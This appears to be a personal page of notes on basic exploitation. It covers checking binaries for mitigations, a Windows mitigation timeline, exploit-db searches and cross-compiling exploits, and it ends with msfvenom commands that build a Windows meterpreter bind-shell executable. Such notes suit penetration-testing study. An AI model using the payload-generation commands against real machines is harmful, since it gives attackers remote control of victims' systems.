
Last changed: 20.07.2020

basic exploitation


Here I collect some notes on finding or writing simple exploits.

exploitation

The websites root-me.org and io.netgarage.org offer many different challenges for practice.

exploit mitigations


To detect optional exploit mitigation features in PE binaries, the pev toolkit contains the tool pesec:

pesec binary.exe

For ELF binaries you can use checksec.sh (the script expects the target as --file=):

./checksec --file=elf_binary
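As an added example (not part of these notes and not code from pev or checksec.sh), a minimal checksec-style parser in Python that reads the ELF64 program headers to report NX, PIE and RELRO, plus a builder for constructed ELF images so it can be tested offline; the constants are the standard ELF values, the function names are my own.

```python
import struct

# Standard ELF constants (see elf.h).
PT_GNU_STACK = 0x6474E551   # stack permissions; absent means executable stack
PT_GNU_RELRO = 0x6474E552   # region made read-only after relocation
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
ET_EXEC, ET_DYN = 2, 3
EHDR = "<16sHHIQQQIHHHHHH"  # little-endian ELF64 header, 64 bytes
PHDR = "<IIQQQQQQ"          # little-endian ELF64 program header, 56 bytes


def check_elf_mitigations(data: bytes) -> dict:
    """Report NX, PIE and RELRO for a little-endian ELF64 image (no canary/full-RELRO check)."""
    if len(data) < 64 or data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    hdr = struct.unpack_from(EHDR, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    stack_flags = None
    relro = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {
        # NX only holds when PT_GNU_STACK is present and lacks the X bit
        "nx": stack_flags is not None and not (stack_flags & PF_X),
        # an ET_DYN main executable is position independent (shared objects are ET_DYN too)
        "pie": e_type == ET_DYN,
        "relro": relro,
    }


def build_elf(pie: bool, nx: bool, relro: bool) -> bytes:
    """Constructed sample input: ELF header plus program headers only, not loadable."""
    phdrs = [(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0, 0, 0, 0, 16)]
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R, 0, 0, 0, 0, 0, 1))
    ident = b"\x7fELF\x02\x01\x01" + bytes(9)  # ELF64, little-endian, version 1
    ehdr = struct.pack(EHDR, ident, ET_DYN if pie else ET_EXEC, 0x3E, 1, 0,
                       64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR, *p) for p in phdrs)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_elf(True, True, True)
    print(check_elf_mitigations(data))
```

Run it against a real binary by passing its path; without an argument it checks the constructed hardened sample.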

windows mitigation timeline

The following table lists some exploit mitigations and the Windows version that introduced each of them.

XP SP2       Vista     Windows 7   Windows 8    Windows 10
DEP          ASLR      EMET        GuardPages   CFG
SafeSEH      LFH                   SMEP         Exploit Guard
SafeUnlink   SEHOP
Canaries

You can check the Exploit Guard status in Windows 10 with PowerShell:

Get-ProcessMitigation -System

find publicly available exploits


online exploit resources

www.exploit-db.com/search/
google: <search_string> exploit site:securityfocus.com inurl:bid

exploit-db (offline)

searchsploit <search_string>
grep -i <search_string> /usr/share/exploitdb/files_exploits.csv

compilation


show local libc version

$(ldd $(which ls) | grep libc.so | cut -d " " -f3) | head -n1

compile for 32-bit target

apt install gcc-multilib
gcc -m32 exploit.c -o exploit

compile for windows target

/home/user/.wine/drive_c/MinGW/bin/gcc.exe exploit.c -o exploit.exe

Another way to set up the cross-compile environment is to install veil-evasion.

meterpreter binary

msfvenom -l payloads
msfvenom -p windows/x64/meterpreter/bind_tcp --list-options
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1337 -f exe -o meterpreter.exe